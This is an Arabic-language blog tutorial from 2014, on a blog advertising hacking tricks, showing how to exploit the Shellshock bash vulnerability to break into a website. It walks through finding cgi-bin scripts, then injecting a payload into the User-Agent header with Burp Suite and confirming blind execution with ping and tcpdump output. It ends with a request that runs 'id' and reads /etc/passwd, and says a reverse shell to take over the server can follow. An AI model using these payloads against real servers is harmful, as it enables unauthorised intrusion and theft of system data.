دروس-شروحات-ثغرات-خدع-اختراق شبكات-تعطيل حسابات

----------------------------------------------------------------------------------------

الاثنين، 8 ديسمبر 2014

ثغرة Shellshock ماهي وكيف يتم استغلالها


بسم الله الرحمن الرحيم
إن شاء الله في هذا الدرس رح نتعرف على ثغرات shellshock  انتشر خبر نزول ثغرة اصابت انظمة linux , unix  في الاونة الاخيرة ..
هذي الثغرة عرفت بأسم shellshock وذالك لأنها تصيب bashshell  في الانظمة السابقة .
من اجل التعرف في حاله كان النظام مصاب او لا يتم طباعة الامر التالي على  سطر الاوامر
() { :; }; /bin/bash -c 'echo vulnerable!'

نتيجة الامر اذا كان النظام مصاب رح يطبع لنا vulnerable
طيب الان نجي على التطبيق على الموقع كيف نستخدم هذي الثغرة في اختراق موقع . 

في البداية نفرض ان معانا الموقع التالي . 

http://site.com/
على شان نطبق هذي الثغرة على الموقع السابق يلزمنا ملفات او مجلدات موجودة على مسار cgi-bin
في هذي الطريقة رح نعتمد على اي برنامج تخمين يخمن لنا الملفات الشائعة الي تتوفر على المسار السابق
طيب انا وجدت المجلد التالي
cgi-bin/status
الان نجي على طريقة الاستغلال
 HTTP headers الاستغلال يتعمد على حقن
اكثر HTTP Headers شيوعاً
  • User-Agent
  • Host
  • Referer
 User-Agent انا رح احقن
الان نشغل برنامج burpsuite الشهير ونعترض الطلب الخاص بالملف الي اوجدناه في الخطوة الاولى ونحقن الكود السابق من اجل التأكد اذا كان النظام الي متركب عليه الموقع مصاب او لا
إعتراض الطلب وتكراره
طيب الان نشوف النتيجة
burp_fail
طيب الان مثل ما انتوا شايفين ما طبع لنا كلمة vulnerable
والحل …؟؟؟
نجرب نغير مكان كلمة  vulnerable  بأمر على bash ويفضل يكون الامر ping من اجل تخطي اذا كان في فلترة عاملها السيرفر
نشوف النتيجة
20:02:14.854659 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 0, length 64
20:02:14.854706 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 0, length 64
20:02:15.856028 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 1, length 64
20:02:15.856050 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 1, length 64
20:02:16.856425 IP 172.16.246.132 > 172.16.246.129: ICMP echo request, id 18947, seq 2, length 64
20:02:16.856451 IP 172.16.246.129 > 172.16.246.132: ICMP echo reply, id 18947, seq 2, length 64
 .. بعد التنصت من خلال برنامج tcpdump  تم الرد بنجاح
burp_success
 Pingالان ما دام قدرنا نتخطى الفلترة الي عاملها السيرفر بنقوم نضيف اوامرنا بعد الامر
نشوف كيف . ؟
GET /cgi-bin/status HTTP/1.0
user-agent: () { :; }; /bin/bash -c ‘ping -c 3 172.16.246.129; id; cat /etc/passwd’
نشوف النتيجة . ,
burp_success_chain

وبهذا الشكل استطعنا استغلال ثغرات shellshock الشهيرة وتنفيذ اوامر باالامكان الان الاتصال العكسي بالسيرفر واختراقة .

انتهى الدرس

0 التعليقات:

إرسال تعليق